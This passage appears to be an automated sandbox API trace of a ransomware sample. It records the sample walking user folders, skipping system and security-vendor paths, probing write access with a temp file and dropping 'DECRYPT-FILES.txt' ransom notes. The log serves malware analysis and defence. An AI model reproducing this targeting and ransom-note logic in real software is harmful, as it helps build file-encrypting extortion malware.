dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.583] GetLastError () returned 0x5 [0186.583] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0186.583] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.583] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 57 [0186.583] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.584] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0186.584] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*" [0186.584] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.584] CloseHandle (hObject=0xffffffff) returned 0 [0186.584] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0186.584] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0186.584] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0186.584] lstrcatW (in: lpString1="My Videos", lpString2="\\" | out: lpString1="My Videos\\") returned="My Videos\\" [0186.584] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\Program Files") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch=":\\Windows") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\Games\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\All Users") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="AhnLab") returned 0x0 [0186.584] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.584] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0186.584] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.584] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\0a16c9.tmp") returned 48 [0186.584] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\documents\\my videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.585] GetLastError () returned 0x5 [0186.585] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0186.585] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.585] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 55 [0186.585] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.585] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0186.585] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*") returned="C:\\Users\\Default\\Documents\\My Videos\\*" [0186.585] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.585] CloseHandle (hObject=0xffffffff) returned 0 [0186.585] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos\\", cAlternateFileName="MYVIDE~1")) returned 0 [0186.585] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.586] CloseHandle (hObject=0xffffffff) returned 0 [0186.586] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0186.586] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0186.586] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0186.586] lstrcatW (in: lpString1="Downloads", lpString2="\\" | out: lpString1="Downloads\\") returned="Downloads\\" [0186.586] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\Program Files") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch=":\\Windows") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\Games\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\All Users") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="AhnLab") returned 0x0 [0186.586] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.586] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0186.586] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.586] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Downloads\\\\0a16c9.tmp") returned 38 [0186.586] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\downloads\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.587] GetLastError () returned 0x5 [0186.587] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0186.587] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.587] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Downloads\\\\DECRYPT-FILES.txt") returned 45 [0186.587] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.587] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0186.587] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0186.587] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.587] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.587] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.587] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.587] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dd3660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.587] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.587] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.587] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.587] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.587] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.587] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.587] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.587] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.587] CloseHandle (hObject=0xffffffff) returned 0 [0186.587] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0186.587] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0186.587] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0186.588] lstrcatW (in: lpString1="Favorites", lpString2="\\" | out: lpString1="Favorites\\") returned="Favorites\\" [0186.588] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\Program Files") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch=":\\Windows") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\Games\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\All Users") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="AhnLab") returned 0x0 [0186.588] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.588] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0186.588] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.588] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\\\0a16c9.tmp") returned 38 [0186.588] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\favorites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.594] GetLastError () returned 0x5 [0186.594] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0186.594] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.594] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\\\DECRYPT-FILES.txt") returned 45 [0186.594] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.596] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0186.596] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0186.596] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.597] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.597] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.597] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.597] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.597] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dd3660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.597] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.597] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.597] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.597] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.597] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.597] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.597] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0df97c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0186.597] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0186.597] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0186.597] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0186.597] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\Program Files") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch=":\\Windows") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\Games\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\All Users") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.597] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.598] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.598] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="AhnLab") returned 0x0 [0186.598] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.598] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0186.598] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.598] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\\\0a16c9.tmp") returned 44 [0186.598] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\favorites\\links\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.606] GetLastError () returned 0x5 [0186.606] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0186.606] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.606] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\\\DECRYPT-FILES.txt") returned 51 [0186.606] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.607] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0186.607] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*") returned="C:\\Users\\Default\\Favorites\\Links\\*" [0186.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0df97c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.608] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.608] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0df97c0, 